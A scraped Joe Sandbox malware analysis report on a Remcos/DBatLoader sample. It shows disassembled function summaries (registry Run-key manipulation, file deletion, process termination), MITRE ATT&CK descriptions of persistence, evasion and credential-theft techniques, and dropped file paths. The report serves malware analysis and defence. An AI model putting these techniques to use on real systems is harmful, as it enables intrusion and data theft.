Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 5066be23c52cfaa6c6245271f0373fbb1ceb4cf0ed24aba14fe9ece54d79b194
Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
Opcode Fuzzy Hash: 5066be23c52cfaa6c6245271f0373fbb1ceb4cf0ed24aba14fe9ece54d79b194
Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF

Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

__Init_thread_footer.LIBCMT ref: 00410F29

Strings

0kG, xrefs: 00410F31
,kG, xrefs: 00410F04

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: ,kG$0kG
API String ID: 1881088180-2015055088
Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D

Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A31
RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A45

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668

Function 0535F46C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 0538543D: __onexit.LIBCMT ref: 05385443

__Init_thread_footer.LIBCMT ref: 05361BF6

Strings

,kG, xrefs: 05361BD1
0kG, xrefs: 05361BFE

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: ,kG$0kG
API String ID: 1881088180-2015055088
Opcode ID: 55ded91c2411799c93627b1e27181bc6755349442ad5772556d3e3dbb5a5a571
Instruction ID: ba4e65756ac51560269f064cb27abe31a4e6fa89c92a1ca346fc631b7c1bf21d
Opcode Fuzzy Hash: 55ded91c2411799c93627b1e27181bc6755349442ad5772556d3e3dbb5a5a571
Instruction Fuzzy Hash: E6E02031300E209FC218B3289688DA933E6DF4A330761C16FD005D72D4DF167441CE5D

Function 053646F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0535E19B,00000000,?,00000000), ref: 053646FE
RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 05364712

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 053646FC

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction ID: 9bf88dd53b38dc21e24b3f676ef9480d1ae568ca945b046a7932100dd51f2336
Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction Fuzzy Hash: 50E0C27164430CFBDF104FB1DD06FBA3B2DEB02F02F0046A8BA0692492C622CE049670

Function 0040B869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1

Strings

pth_unenc, xrefs: 0040B869

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: DeleteDirectoryFileRemove
String ID: pth_unenc
API String ID: 3325800564-4028850238
Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8

Function 0535C536 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,?,?,0535B980,0000005C,?,?,?,00000000), ref: 0535C543
RemoveDirectoryW.KERNEL32(00000000,?,?,0535B980,0000005C,?,?,?,00000000), ref: 0535C56E

Strings

hdF, xrefs: 0535C551

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: DeleteDirectoryFileRemove
String ID: hdF
API String ID: 3325800564-665520524
Opcode ID: 2e0f71548beba5a730f37ec643fdbde7cff5540ab6036cf56b22bcb1e85fbdea
Instruction ID: 8a54fc16ccaa30f21c0455a033f87f0a0e853adb561f205eb72da1b1e6961867
Opcode Fuzzy Hash: 2e0f71548beba5a730f37ec643fdbde7cff5540ab6036cf56b22bcb1e85fbdea
Instruction Fuzzy Hash: 72E08C752107109BCB10AB34888CFD7339CAF01221F042D6AAC93D3511DF24DC48CA60

Function 00412850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
WaitForSingleObject.KERNEL32(000000FF), ref: 00412873

Strings

pth_unenc, xrefs: 00412850

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ObjectProcessSingleTerminateWait
String ID: pth_unenc
API String ID: 1872346434-4028850238
Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59

Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
GetLastError.KERNEL32 ref: 00440D35
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759

Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report HGTQP09643009.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\remcos\logs.dat

C:\Users\Public\Jsqwmpul.url

C:\Users\Public\Libraries\Jsqwmpul.PIF

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

Windows Analysis Report
HGTQP09643009.scr.exe

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre